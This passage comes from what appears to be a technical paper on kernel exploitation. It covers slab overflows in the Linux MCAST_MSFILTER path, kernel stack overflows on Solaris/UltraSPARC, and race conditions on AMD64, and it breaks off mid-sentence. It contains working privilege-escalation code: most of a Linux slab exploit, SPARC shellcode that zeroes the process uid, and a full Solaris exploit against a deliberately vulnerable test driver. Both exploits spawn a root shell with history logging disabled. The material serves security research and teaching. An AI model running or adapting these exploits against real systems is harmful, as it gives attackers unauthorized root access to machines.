        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = 0xbad;
        sin->sin_addr.s_addr = 0xdeadbeef;



void    cleanup ()
        int                     i = 0;
        struct shmid_ds         s;

        for ( i = 0; i < fillup_1024; i++ )
                kill(pid[i], SIGUSR1);
                waitpid(pid[i], NULL, __WCLONE);

        for ( i = 0; i < fillup_64 - 2; i++ )
                shmctl(shmid[i], IPC_RMID, &s);


#define EVIL_GAP        4
#define SLAB_1024       "size-1024"
#define SLAB_64         "size-64"
#define OVF             21
#define CHUNKS          1024
#define LOOP_VAL        0x4000000f
#define CHIEN_VAL       0x4000000b

        int                     sockfd, ret, i;
        unsigned int            true_alloc_size, last_alloc_chunk, loops;
        char                    *buffer;
        struct group_filter     *gf;
        struct shmid_ds         s;

        char    *argv[] = { "le-chien", NULL };
        char    *envp[] = { "TERM=linux", "PS1=le-chien\\$",
"BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null",
"HISTFILE=/dev/null", NULL };

        true_alloc_size = sizeof(struct group_filter) - sizeof(struct
sockaddr_storage) + sizeof(struct sockaddr_storage) * OVF;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        uid = getuid();
        gid = getgid();

        gf = malloc (true_alloc_size);
        if ( gf == NULL )
                fatal("Malloc failure\n");

        gf->gf_interface = 0;
        gf->gf_group.ss_family = AF_INET;

        fillup_64 = calculate_slaboff(SLAB_64);

        if ( fillup_64 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_64, fillup_64);

        /* Yes, two would be enough, but we have that "sexy" #define, why
don't use it ? :-) */

        fillup_64 += EVIL_GAP;

        shmid = malloc(fillup_64 * sizeof(int));
        if ( shmid == NULL )
                fatal("Malloc failure\n");

        /* Filling up the size-64 and obtaining a new page with EVIL_GAP
entries */

        for ( i = 0; i < fillup_64; i++ )
                shmid[i] = shmget(IPC_PRIVATE, 4096, IPC_CREAT|SHM_R);

        prepare_evil_gf(gf, shmid[fillup_64 - 1]);

        buffer = (char *)gf;

        fillup_1024 = calculate_slaboff(SLAB_1024);
        if ( fillup_1024 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_1024, fillup_1024);

        fillup_1024 += EVIL_GAP;

        pid = malloc(fillup_1024 * sizeof(int));
        if (pid  == NULL )
                fatal("Malloc failure\n");

        for ( i = 0; i < fillup_1024; i++)
                pid[i] = clone(populate_1024_slab, stack + sizeof(stack) -
4, 0, NULL);

        printf("[+] Attempting to trash size-1024 slab\n");

        /* Here starts the loop trashing size-1024 slab */

        last_alloc_chunk = true_alloc_size % CHUNKS;
        loops = true_alloc_size / CHUNKS;

        gf->gf_numsrc = LOOP_VAL;

        printf("[+] Last size-1024 chunk is of size %d\n",
        printf("[+] Looping for %d chunks\n", loops);

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        if ( last_alloc_chunk > 512  )
                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
loops * CHUNKS, last_alloc_chunk);

         * Should never happen. If it happens it probably means that we've
         * bigger datatypes (or slab-size), so probably
         * there's something more to "fix me". The while loop below is
         * already okay for the eventual fixing ;)
              fatal("Last alloc chunk fix me\n");

        while ( loops > 1 )
                kill(pid[--fillup_1024], SIGUSR1);
                waitpid(pid[fillup_1024], NULL, __WCLONE);

                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
--loops * CHUNKS, CHUNKS);

        /* Let's the real fun begin */

        gf->gf_numsrc = CHIEN_VAL;

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        shmctl(shmid[fillup_64 - 2], IPC_RMID, &s);
        setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer, CHUNKS);


        ret = (unsigned long)shmat(shmid[fillup_64 - 1], NULL,

        if ( ret == -1)
                printf("Le Fucking Chien GAGNE!!!!!!!\n");
                setresuid(0, 0, 0);
                setresgid(0, 0, 0);
                execve("/bin/sh", argv, envp);

        printf("Here we are, something sucked :/ (if not L1_cache too big,
probably slab align, retry)\n" );

< / > 

------[ 2.3 - Stack overflow vulnerabilities

When a process is in 'kernel mode' it has a stack which is different from
the stack it uses at userland. We'll call it 'kernel stack'. 
That kernel stack is usually limited in size to a couple of pages (on
Linux, for example, it is 2 pages, 8kb, but an option at compile time 
exist to have it limited at one page) and is not a surprise that a common
design practice in kernel code developing is to use locally to a function
as little stack space as possible.

At a first glance, we can imagine two different scenarios that could go
under the name of 'stack overflow vulnerabilities' :

 - 'standard' stack overflow vulnerability : a write past a buffer on the
   stack overwrites the saved instruction pointer or the frame pointer
   (Solaris only, Linux is compiled with -fomit-frame-pointer) or some
   variable (usually a pointer) also located in the stack. 

 - 'stack size overflow' : a deeply nested callgraph goes further the
   alloc'ed stack space.  

Stack based explotation is more architectural and o.s. specific than the
already presented slab based one.
That is due to the fact that once the stack is trashed we achieve
execution flow hijack, but then we must find a way to somehow return to
userland. We con't cover here the details of x86 architecture, since those
have been already very well explained by noir in his phrack60 paper [13]. 

We will instead focus on the UltraSPARC architecture and on its more
common operating system, Solaris. The next subsection will describe the
relevant details of it and will present a technique which is suitable
aswell for the exploiting of slab based overflow (or, more generally,
whatever 'controlled flow redirection' vulnerability). 

The AMD64 architecture won't be covered yet, since it will be our 'example
architecture' for the next kind of vulnerabilities (race condition). The
sendmsg [5] exploit proposed later on is, at the end, a stack based one.

Just before going on with the UltraSPARC section we'll just spend a couple
of words describing the return-to-ring3 needs on an x86 architecture and
the Linux use of the kernel stack (since it quite differs from the Solaris

Linux packs together the stack and the struct associated to every process
in the system (on Linux 2.4 it was directly the task_struct, on Linux 2.6
it is the thread_info one, which is way smaller and keeps inside a pointer
to the task_struct). This memory area is, by default, 8 Kb (a kernel
option exist to have it limited to 4 Kb), that is the size of two pages,
which are allocated consecutively and with the first one aligned to a 2^13
multiple. The address of the thread_struct (or of the task_struct) is thus
calculable at runtime by masking out the 13 least significant bits of the
Kernel Stack (%esp).  

The stack starts at the bottom of this page and 'grows' towards the top,
where the thread_info (or the task_struct) is located. To prevent the
'second' type of overflow when the 4 Kb Kernel Stack is selected at
compile time, the kernel uses two adjunctive per-CPU stacks, one for
interrupt handling and one for softirq and tasklets functions, both one
page sized. 

It is obviously on the stack that Linux stores all the information to
return from exceptions, interrupts or function calls and, logically, to 
get back to ring3, for example by means of the iret instruction. 
If we want to use the 'iret' instruction inside our shellcodes to get out
cleanly from kernel land we have to prepare a fake stack frame as it
expects to find.

We have to supply:
  - a valid user space stack pointer
  - a valid user space instruction pointer
  - a valid EFLAGS saved EFLAGS register
  - a valid User Code Segment
  - a valid User Stack Segment

 |                 |
 |   User SS       | -+
 |   User ESP      |  |
 |   EFLAGS        |  |  Fake Iret Frame
 |   User CS       |  |
 |   User EIP      | -+  <----- current kernel stack pointer (ESP)
 |                 |
We've added a demonstrative stack based exploit (for the Linux dummy 
driver) which implements a shellcode doing that recovery-approach :

  movl   $0x7b,0x10(%esp)       // user stack segment (SS)
  movl   $stack_chunk,0xc(%esp) // user stack pointer (ESP)
  movl   $0x246,0x8(%esp)       // valid EFLAGS saved register
  movl   $0x73,0x4(%esp)        // user code segment (CS)
  movl   $code_chunk,0x0(%esp)  // user code pointer  (EIP)

You can find it in < expl/linux/stack_based.c > 

---[ 2.3.1 - UltraSPARC exploiting

The UltraSPARC [14] is a full implementation of the SPARC V9 64-bit [2] 
architecture. The most 'interesting' part of it from an exploiting
perspective is the support it gives to the operating system for a fully
separated address space among userspace and kernelspace.

This is achieved through the use of context registers and address space
identifiers 'ASI'. The UltraSPARC MMU provides two settable context
registers, the primary (PContext) and the secondary (SContext) one. One
more context register hardwired to zero is provided, which is the nucleus
context ('context' 0 is where the kernel lives).
To every process address space is associated a 'context value', which is
set inside the PContext register during process execution. This value is
used to perform memory addresses translation. 

Every time a process issues a trap instruction to access kernel land (for
example ta 0x8 or ta 0x40, which is how system call are implemented on
Solaris 10), the nucleus context is set as default. The process context
value (as recorded inside PContext) is then moved to SContext, while the
nucleus context becomes the 'primary context'. 

At that point the kernel code can access directly the userland by
specifying the correct ASI to a load or store alternate instruction
(instructions that support a direct asi immediate specified - lda/sta). 
Address Space Identifiers (ASIs) basically specify how those instruction
have to behave :

< usr/src/uts/sparc/v9/sys/asi.h >

#define ASI_N                   0x04    /* nucleus */
#define ASI_NL                  0x0C    /* nucleus little */
#define ASI_AIUP                0x10    /* as if user primary */
#define ASI_AIUS                0x11    /* as if user secondary */
#define ASI_AIUPL               0x18    /* as if user primary little */
#define ASI_AIUSL               0x19    /* as if user secondary little */


#define ASI_USER        ASI_AIUS

< / > 

Theese are ASI that are specified by the SPARC v9 reference (more ASI are
machine dependant and let modify, for example, MMU or other hardware
registers, check usr/src/uts/sun4u/sys/machasi.h), the 'little' version is
just used to specify a byte ordering access different from the 'standard'
big endian one (SPARC v9 can access data in both formats).

The ASI_USER is the one used to access, from kernel land, the user space. 
An instruction like :

       ldxa [addr]ASI_USER, %l1 

would just load the double word stored at 'addr', relative to the address
space contex stored in the SContext register, 'as if' it was accessed by
userland code (so with all protection checks). 

It is thus possible, if able to start executing a minimal stub of code, to
copy bytes from the userland wherever we want at kernel land.  

But how do we execute code at first ? Or, to make it even more clearer,
where do we return once we have performed our (slab/stack) overflow and
hijacked the instruction pointer ? 

To complicate things a little more, the UltraSPARC architecture implements
the execution bit permission over TTEs (Translation Table Entry, which are
the TLB entries used to perform virtual/physical translations). 

It is time to give a look at Solaris Kernel implementation to find a
solution. The technique we're going to present now (as you'll quickly
figure out) is not limited to stack based exploiting, but can be used
every time you're able to redirect to an arbitrary address the instruction 
flow at kernel land.

---] 2.3.2 - A reliable Solaris/UltraSPARC exploit

The Solaris process model is slightly different from the Linux one. The
foundamental unit of scheduling is the 'kernel thread' (described by the
kthread_t structure), so one has to be associated to every existing LWP 
(light-weight process) in a process.
LWPs are just kernel objects which represent the 'kernel state' of every
'user thread' inside a process and thus let each one enter the kernel
indipendently (without LWPs, user thread would contend at system call).

The information relative to a 'running process' are so scattered among
different structures. Let's see what we can make out of them. 
Every Operating System (and Solaris doesn't differ) has a way to quickly
get the 'current running process'. On Solaris it is the 'current kernel
thread' and it's obtained, on UltraSPARC, by :

#define curthread       (threadp())  

< usr/src/uts/sparc/ml/ >

! return current thread pointer

        .inline threadp,0
        .register %g7, #scratch
        mov     %g7, %o0

< / > 

It is thus stored inside the %g7 global register. 
From the kthread_t struct we can access all the other 'process related'
structs. Since our main purpose is to raise privileges we're interested in
where the Solaris kernel stores process credentials. 

Those are saved inside the cred_t structure pointed to by the proc_t one :

# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
> 0000030000e67488::print proc_t
    p_exec = 0x30000e5b5a8
    p_as = 0x300008bae48
    p_lockp = 0x300006167c0
    p_crlock = {
        _opaque = [ 0 ]
    p_cred = 0x3000026df28
> 0x3000026df28::print cred_t
    cr_ref = 0x67b
    cr_uid = 0
    cr_gid = 0
    cr_ruid = 0
    cr_rgid = 0
    cr_suid = 0
    cr_sgid = 0
    cr_ngroups = 0
    cr_groups = [ 0 ]
> ::offsetof proc_t p_cred
offsetof (proc_t, p_cred) = 0x20
> ::quit


The '::ps' dcmd ouput introduces a very interesting feature of the Solaris
Operating System, which is a god-send for exploiting.
The address of the proc_t structure in kernel land is exported to
userland : 

bash-2.05$ ps -aef -o addr,comm | grep snmpdx
     30000e67488 /usr/lib/snmp/snmpdx

At a first glance that could seem of not great help, since, as we said, 
the kthread_t struct keeps a pointer to the related proc_t one :

> ::offsetof kthread_t t_procp
offsetof (kthread_t, t_procp) = 0x118
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
> 0000030000e67488::print proc_t p_tlist
p_tlist = 0x30000e52800
> 0x30000e52800::print kthread_t t_procp
t_procp = 0x30000e67488

To understand more precisely why the exported address is so important we
have to take a deeper look at the proc_t structure. 
This structure contains the user_t struct, which keeps information like
the program name, its argc/argv value, etc : 

> 0000030000e67488::print proc_t p_user
    p_user.u_ticks = 0x95c
    p_user.u_comm = [ "snmpdx" ]
    p_user.u_psargs = [ "/usr/lib/snmp/snmpdx -y -c /etc/snmp/conf" ]
    p_user.u_argc = 0x4
    p_user.u_argv = 0xffbffcfc
    p_user.u_envp = 0xffbffd10
    p_user.u_cdir = 0x3000063fd40

We can control many of those. 
Even more important, the pages that contains the process_cache (and thus
the user_t struct), are not marked no-exec, so we can execute from there
(for example the kernel stack, allocated from the seg_kp [kernel pageable
memory] segment, is not executable). 

Let's see how 'u_psargs' is declared :

< usr/src/common/sys/user.h >
#define PSARGSZ         80      /* Space for exec arguments (used by
ps(1)) */
#define MAXCOMLEN       16      /* <= MAXNAMLEN, >= sizeof (ac_comm) */


typedef struct  user {
         * These fields are initialized at process creation time and never
         * modified.  They can be accessed without acquiring locks.
        struct execsw *u_execsw;        /* pointer to exec switch entry */
        auxv_t  u_auxv[__KERN_NAUXV_IMPL]; /* aux vector from exec */
        timestruc_t u_start;            /* hrestime at process start */
        clock_t u_ticks;                /* lbolt at process start */
        char    u_comm[MAXCOMLEN + 1];  /* executable file name from exec
        char    u_psargs[PSARGSZ];      /* arguments from exec */
        int     u_argc;                 /* value of argc passed to main()
        uintptr_t u_argv;               /* value of argv passed to main()
        uintptr_t u_envp;               /* value of envp passed to main()

< / >

The idea is simple : we put our shellcode on the command line of our
exploit (without 'zeros') and we calculate from the exported proc_t
address the exact return address.
This is enough to exploit all those situations where we have control of
the execution flow _without_ trashing the stack (function pointer
overwriting, slab overflow, etc). 

We have to remember to take care of the alignment, thou, since the
UltraSPARC fetch unit raises an exception if the address it reads the
instruction from is not aligned on a 4 bytes boundary (which is the size
of every sparc instruction) :

> ::offsetof proc_t p_user
offsetof (proc_t, p_user) = 0x330
> ::offsetof user_t u_psargs
offsetof (user_t, u_psargs) = 0x161

Since the proc_t taken from the 'process cache' is always aligned to an 8
byte boundary, we have to jump 3 bytes after the starting of the u_psargs
char array (which is where we'll put our shellcode).  
That means that we have space for 76 / 4 = 19 instructions, which is
usually enough for average shellcodes.. but space is not really a limit
since we can 'chain' more psargs struct from different processes, simply
jumping from each others. Moreover we could write a two stage shellcode
that would just start copying over our larger one from the userland using
the load from alternate space instructions presented before. 

We're now facing a slightly more complex scenario, thou, which is the
'kernel stack overflow'. We assume here that you're somehow familiar with
userland stack based exploiting (if you're not you can check [15] and
The main problem here is that we have to find a way to safely return to
userland once trashed the stack (and so, to reach the instruction pointer,
the frame pointer). A good way to understand how the 'kernel stack' is
used to return to userland is to follow the path of a system call. 
You can get a quite good primer here [17], but we think that a read
through opensolaris sources is way better (you'll see also, following the
sys_trap entry in uts/sun4u/ml/mach_locore.s, the code setting the nucleus
context as the PContext register). 

Let's focus on the 'kernel stack' usage : 

< usr/src/uts/sun4u/ml/mach_locore.s >

        ! user trap
        ! make all windows clean for kernel
        ! buy a window using the current thread's stack
        sethi   %hi(nwin_minus_one), %g5
        ld      [%g5 + %lo(nwin_minus_one)], %g5
        wrpr    %g0, %g5, %cleanwin
        CPU_ADDR(%g5, %g6)
        ldn     [%g5 + CPU_THREAD], %g5
        ldn     [%g5 + T_STACK], %g6
        sub     %g6, STACK_BIAS, %g6
        save    %g6, 0, %sp
< / > 

In %g5 is saved the number of windows that are 'implemented' in the
architecture minus one, which is, in that case, 8 - 1 = 7.
CLEANWIN is set to that value since there are no windows in use out of the
current one, and so the kernel has 7 free windows to use. 

The cpu_t struct addr is then saved in %g5 (by CPU_ADDR) and, from there,
the thread pointer [ cpu_t->cpu_thread ] is obtained. 
From the kthread_t struct is obtained the 'kernel stack address' [the
member name is called t_stk]. This one is a good news, since that member
is easy accessible from within a shellcode (it's just a matter of
correctly accessing the %g7 / thread pointer). From now on we can follow
the sys_trap path and we'll be able to figure out what we will find on the
stack just after the kthread_t->t_stk value and where. 

To that value is then subtracted 'STACK_BIAS' : the 64-bit v9 SPARC ABI
specifies that the %fp and %sp register are offset by a constant, the
stack bias, which is 2047 bits. This is one thing that we've to remember
while writing our 'stack fixup' shellcode. 
On 32-bit running kernels the value of this constant is 0. 

The save below is another good news, because that means that we can use
the t_stk value as a %fp (along with the 'right return address') to return
at 'some valid point' inside the syscall path (and thus let it flow from
there and cleanily get back to userspace). 

The question now is : at which point ? Do we have to 'hardcode' that
return address or we can somehow gather it ? 

A further look at the syscall path reveals that :

        mov     %l6, THREAD_REG
        wrpr    %g0, PSTATE_KERN, %pstate       ! enable ints
        jmpl    %l3, %o7                        ! call trap handler
        mov     %l7, %o0

And, that %l3 is : 

        SYSTRAP_TRACE(%o1, %o2, %o3)

        ! at this point we have a new window we can play in,
        ! and %g6 is the label we want done to bounce to
        ! save needed current globals
        mov     %g1, %l3        ! pc
        mov     %g2, %o1        ! arg #1
        mov     %g3, %o2        ! arg #2
        srlx    %g3, 32, %o3    ! pseudo arg #3
        srlx    %g2, 32, %o4    ! pseudo arg #4
%g1 was preserved since : 

#define SYSCALL(which)                  \
        TT_TRACE(trace_gen)             ;\
        set     (which), %g1            ;\
        ba,pt   %xcc, sys_trap          ;\
        sub     %g0, 1, %g4             ;\
        .align  32

and so it is syscall_trap for LP64 syscall and syscall_trap32 for ILP32
syscall. Let's check if the stack layout is the one we expect to find :

> ::ps ! grep snmp
R    291      1    291    291     0 0x00020008 0000030000db4060 snmpXdmid
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> 0000030000d2f488::print proc_t p_tlist
p_tlist = 0x30001dd4800
> 0x30001dd4800::print kthread_t t_stk
t_stk = 0x2a100497af0 ""
> 0x2a100497af0,16/K
0x2a100497af0:  1007374         2a100497ba0     30001dd2048     1038a3c
                1449e10         0               30001dd4800
                2a100497ba0     ffbff700        3               3a980
                0               3a980           0
                ffbff6a0        ff1525f0        0               0
                0               0               0
> syscall_trap32=X
Analyzing the 'stack frame' we see that the saved %l6 is exactly
THREAD_REG (the thread value, 30001dd4800) and %l3 is 1038a3c, the
syscall_trap32 address. 

At that point we're ready to write our 'shellcode' : 

# cat sparc_stack_fixup64.s

.globl begin
.globl end

        ldx [%g7+0x118], %l0
        ldx [%l0+0x20], %l1
        st %g0, [%l1 + 4]
        ldx [%g7+8], %fp
        ldx [%fp+0x18], %i7
        sub %fp,2047,%fp
        add 0xa8, %i7, %i7


At that point it should be quite readable : it gets the t_procp address
from the kthread_t struct and from there it gets the p_cred addr.
It then sets to zero (the %g0 register is hardwired to zero) the cr_uid
member of the cred_t struct and uses the kthread_t->t_stk value to set
%fp. %fp is then dereferenced to get the 'syscall_trap32' address and the
STACK_BIAS subtraction is then performed. 

The add 0xa8 is the only hardcoded value, and it's the 'return place'
inside syscall_trap32. You can quickly derive it from a ::findstack dcmd
with mdb. A more advanced shellcode could avoid this 'hardcoded value' by
opcode scanning from the start of the syscall_trap32 function and looking
for the jmpl %reg,%o7/nop sequence (syscall_trap32 doesn't get a new
window, and stays in the one sys_trap had created) pattern. 
On all the boxes we tested it was always 0xa8, that's why we just left it

As we said, we need the shellcode to be into the command line, 'shifted' 
of 3 bytes to obtain the correct alignment. To achieve that a simple
launcher code was used :

bash-2.05$ cat launcer_stack.c
#include <unistd.h>

char sc[] = "\x66\x66\x66"              // padding for alignment

int main()
        execl("e", sc, NULL);
        return 0;

The shellcode is the one presented before. 

Before showing the exploit code, let's just paste the vulnerable code,
from the dummy driver provided for Solaris :

< stuff/drivers/solaris/test.c >


static int handle_stack (intptr_t arg)
        char buf[32];
        struct test_comunique t_c;

        ddi_copyin((void *)arg, &t_c, sizeof(struct test_comunique), 0);

        cmn_err(CE_CONT, "Requested to copy over buf %d bytes from %p\n",
t_c.size, &buf);

        ddi_copyin((void *)t_c.addr, buf, t_c.size, 0); [1]

        return 0;

static int test_ioctl (dev_t dev, int cmd, intptr_t arg, int mode,
                        cred_t *cred_p, int *rval_p )
    cmn_err(CE_CONT, "ioctl called : cred %d %d\n", cred_p->cr_uid,

    switch ( cmd )
        case TEST_STACKOVF: {


< / > 

The vulnerability is quite self explanatory and is a lack of 'input
sanitizing' before calling the ddi_copyin at [1]. 

Exploit follows :

< stuff/expl/solaris/e_stack.c >

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "test.h"

#define BUFSIZ 192

char buf[192];

typedef struct psinfo {
        int     pr_flag;        /* process flags */
        int     pr_nlwp;        /* number of lwps in process */
        pid_t   pr_pid;         /* unique process id */
        pid_t   pr_ppid;        /* process id of parent */
        pid_t   pr_pgid;        /* pid of process group leader */
        pid_t   pr_sid;         /* session id */
        uid_t   pr_uid;         /* real user id */
        uid_t   pr_euid;        /* effective user id */
        gid_t   pr_gid;         /* real group id */
        gid_t   pr_egid;        /* effective group id */
        uintptr_t pr_addr;      /* address of process */
        size_t  pr_size;        /* size of process image in Kbytes */
} psinfo_t;

#define ALIGNPAD        3

#define PSINFO_PATH     "/proc/self/psinfo"

unsigned long getaddr()
        psinfo_t        info;
        int             fd;

        fd = open(PSINFO_PATH, O_RDONLY);
        if ( fd == -1)
                return -1;

        read(fd, (char *)&info, sizeof (info));
        return info.pr_addr;

#define UPSARGS_OFFSET 0x330 + 0x161

int exploit_me()
        char    *argv[] = { "princess", NULL };
        char    *envp[] = { "TERM=vt100", "BASH_HISTORY=/dev/null",
"HISTORY=/dev/null", "history=/dev/null",
"HISTFILE=/dev/null", NULL };

         printf("Pleased to see you, my Princess\n");
         setreuid(0, 0);
         setregid(0, 0);
         execve("/bin/sh", argv, envp);


#define SAFE_FP     0x0000000001800040 + 1
#define DUMMY_FILE  "/tmp/test"

int main()
        int                     fd;
        int                     ret;
        struct test_comunique   t;
        unsigned long           *pbuf, retaddr, p_addr;

        memset(buf, 'A', BUFSIZ);

        p_addr = getaddr();

        printf("[*] - Using proc_t addr : %p \n", p_addr);

        retaddr = p_addr + UPSARGS_OFFSET + ALIGNPAD;

        printf("[*] - Using ret addr : %p\n", retaddr);

        pbuf = &buf[32];

        pbuf += 2;

        /* locals */

        for ( ret = 0; ret < 14; ret++ )
                *pbuf++ = 0xBBBBBBBB + ret;
        *pbuf++ = SAFE_FP;
        *pbuf = retaddr - 8;

        t.size = sizeof(buf);
        t.addr = buf;

        fd = open(DUMMY_FILE, O_RDONLY);

        ret = ioctl(fd, 1, &t);
        printf("fun %d\n", ret);


< / >

The exploit is quite simple (we apologies, but we didn't have a public one
to show at time of writing) : 

  - getaddr() uses procfs exported psinfo data to get the proc_t address
    of the running process.

  - the return addr is calculated from proc_t addr + the offset of the
    u_psargs array + the three needed bytes for alignment
  - SAFE_FP points just 'somewhere in the data segment' (and ready to be
    biased for the real dereference). Due to SPARC window mechanism we
    have to provide a valid address that it will be used to 'load' the
    saved procedure registers upon re-entering. We don't write on that
    address so whatever readable kernel part is safe. (in more complex 
    scenarios you could have to write over too, so take care). 

  - /tmp/test is just a link to the /devices/pseudo/test@0:0 file      
  - the exploit has to be compiled as a 32-bit executable, so that the
    syscall_trap32 offset is meaningful 

You can compile and test the driver on your boxes, it's really simple. You
can extend it to test more scenarios, the skeleton is ready for it.

------[ 2.4 - A primer on logical bugs : race conditions

Heap and Stack Overflow (even more, NULL pointer dereference) are 
seldomly found on their own, and, since the automatic and human auditing
work goes on and on, they're going to be even more rare. 
What will probably survive for more time are 'logical bugs', which may
lead, at the end, to a classic overflow. 
Figure out a modelization of 'logical bugs' is, in our opinion, nearly 
impossible, each one is a story on itself.
Notwithstanding this, one typology of those is quite interesting (and
'widespread') and at least some basic approaches to it are suitable for a
generic description. 

We're talking about 'race conditions'. 

In short, we have a race condition everytime we have a small window of
time that we can use to subvert the operating system behaviour. A race
condition is usually the consequence of a forgotten lock or other
syncronization primitive or the use of a variable 'too much time after'
the sanitizing of its value. Just point your favorite vuln database search
engine towards 'kernel race condition' and you'll find many different

Winning the race is our goal. This is easier on SMP systems, since the two 
racing threads (the one following the 'raceable kernel path' and the other
competing to win the race) can be scheduled (and be bounded) on different
CPUs. We just need to have the 'racing thread' go faster than the other 
one, since they both can execute in parallel.
Winning a race on UP is harder : we have to force the first kernel path
to sleep (and thus to re-schedule). We have also to 'force' the scheduler
into selecting our 'racing' thread, so we have to take care of scheduling
algorithm implementation (ex. priority based). On a system with a low CPU
load this is generally easy to get : the racing thread is usually
'spinning' on some condition and is likely the best candidate on the

We're going now to focus more on 'forcing' a kernel path to sleep,
analyzing the nowadays common interface to access files, the page cache. 
After that we'll present the AMD64 architecture and show a real race
exploit for Linux on it, based on the sendmsg [5] vulnerability.
Winning the race in that case turns the vuln into a stack based one, so
the discussion will analize stack based explotation on Linux/AMD64 too.

---[ 2.4.1 - Forcing a kernel path to sleep 

If you want to win a race, what's better than slowing down your opponent?
And what's slower than accessing the hard disk, in a modern computer ? 
Operating systems designers know that the I/O over the disk is one of the
major bottleneck on system performances and know aswell that it is one of
the most frequent operations requested. 

Disk accessing and Virtual Memory are closely tied : virtual memory needs
to access the disk to accomplish demand paging and in/out swapping, while
the filesystem based I/O (both direct read/write and memory mapping of
files) works in units of pages and relays on VM functions to perform the
write out of 'dirty' pages. Moreover, to sensibly increase performances,
frequently accessed disk pages are kept in RAM, into the so-called 'Page

Since RAM isn't an inexhaustible resource, pages to be loaded and 'cached'
into it have to be carefully 'selected'. The first skimming is made by the
'Demand Paging' approach : a page is loaded from disk into memory only
when it is referenced, by the page fault handler code. 
Once a filesystem page is loaded into memory, it enters into the 'Page
Cache' and stays in memory for an unspecified time (depending on disk
activity and RAM availability, generally a LRU policy is used as an
Since it's quite common for an userland application to repeatedly access
the same disk content/pages (or for different applications, to access
common files), the 'Page Cache' sensibly increases performances.

One last thing that we have to discuss is the filesystem 'page clustering'.
Another common principle in 'caching' is the 'locality'. Pages near the
referenced one are likely to be accessed in a near future and since we're
accessing the disk we can avoid the future seek-rotation latency if we
load in more pages after the referenced one. How many to load is
determined by the page cluster value. 
On Linux that value is 3, so 2^3 pages are loaded after the referenced
one. On Solaris, if the pages are 8-kb sized, the next eight pages on a
64kb boundary are brought in by the seg_vn driver (mmap-case).

Putting all together, if we want to force a kernel path to sleep we need
to make it reference an un-cached page, so that a 'fault' happens due to
demand paging implementation. The page fault handler needs to perform disk 
I/O, so the process is put to sleep and another one is selected by the
scheduler. Since probably we want aswell our 'controlled contents' to be
at the faulting address we need to mmap the pages, modify them and then
exhaust the page cache before making the kernel re-access them again. 

Filling the 'page cache' has also the effect of consuming a large quantity
of RAM and thus increasing the in/out swapping. On modern operating
systems one can't create a condition of memory pressure only by exhausting
the page cache (as it was possible on very old implementations), since
only some amount of RAM is dedicated to the Page Cache and it would keep
on stealing pages from itself, leaving other subsystems free to perform
well. But we can manage to exhaust those subsystem aswell, for example by
making the kernel do a large amount of 'surviving' slab-allocations. 

Working to put the VM under pressure is something to take always in mind,
since, done that, one can manage to slow down the kernel (favouring races)
and make kmalloc or other allocation function to fail. (A thing that
seldomly happens on normal behaviour). 

It is time, now, for another real life situation. We'll show the sendmsg
[5] vulnerability and exploiting code and we'll describe briefly the AMD64
architectural more exploiting-relevant details.  

---[ 2.4.2 - AMD64 and race condition exploiting: sendmsg

AMD64 is the 64-bit 'extension' of the x86 architecture, which is natively
supported. It supports 64-bit registers, pointers/virtual addresses and
integer/logic operations. AMD64 has two primary modes of operation, 'Long
mode', which is the standard 64-bit one (32-bit and 16-bit binaries can be
still run with almost no performance impact, or even, if recompiled, with
some benefit from the extended number of registers, thanks to the
sometimes-called 'compatibility mode') and 'Legacy mode', for 32-bit 
operating systems, which is basically just like having a standard x86
processor environment.

Even if we won't use all of them in the sendmsg exploit, we're going now
to sum a couple of interesting features of the AMD64 architecture :

  - The number of general purpose register has been extended from 8 up to 
    16. The registers are all 64-bit long (referred with 'r[name|num]',
    f.e. rax, r10). Just like what happened when took over the transition
    from 16-bit to 32-bit, the lower 32-bit of general purpose register 
    are accessible with the 'e' prefix (f.e. eax).

  - push/pop on the stack are 64-bit operations, so 8 bytes are
    pushed/popped each time. Pointers are 64-bit too and that allows a
    theorical virtual address space of 2^64 bytes. As happens for the
    UltraSPARC architecture, current implementations address a limited
    virtual address space (2^48 bytes) and thus have a VA-hole (the least
    significant 48 bits are used and bits from 48 up to 63 must be copies
    of bit 47 : the hole is thus between 0x7FFFFFFFFFFF and
    This limitation is strictly implementation-dependant, so any future
    implementation might take advantage of the full 2^64 bytes range.  
  - It is now possible to reference data relative to the Instruction
    Pointer register (RIP). This is both a good and a bad news, since it
    makes easier writing position independent (shell)code, but also makes
    it more efficient (opening the way for more performant PIE-alike

  - The (in)famous NX bit (bit 63 of the page table entry) is implemented
    and so pages can be marked as No-Exec by the operating system. This is 
    less an issue than over UltraSPARC since actually there's no operating
    system which implements a separated userspace/kernelspace addressing,
    thus leaving open space to the use of the 'return-to-userspace'

  - AMD64 doesn't support anymore (in 'long mode') the use of
    segmentation. This choice makes harder, in our opinion, the creation
    of a separated user/kernel address space. Moreover the FS and GS
    registers are still used for different pourposes. As we'll see, the
    Linux Operating System keeps the GS register pointing to the 'current'
    PDA (Per Processor Data Structure). (check : /include/asm-x86_64/pda.h 
    struct x8664_pda .. anyway we'll get back on that in a short).

After this brief summary (if you want to learn more about the AMD64
architecture you can check the reference manuals at [3]) it is time now to
focus over the 'real vulnerability', the sendmsg [5] one : 

"When we copy 32bit ->msg_control contents to kernel, we walk the
same userland data twice without sanity checks on the second pass.
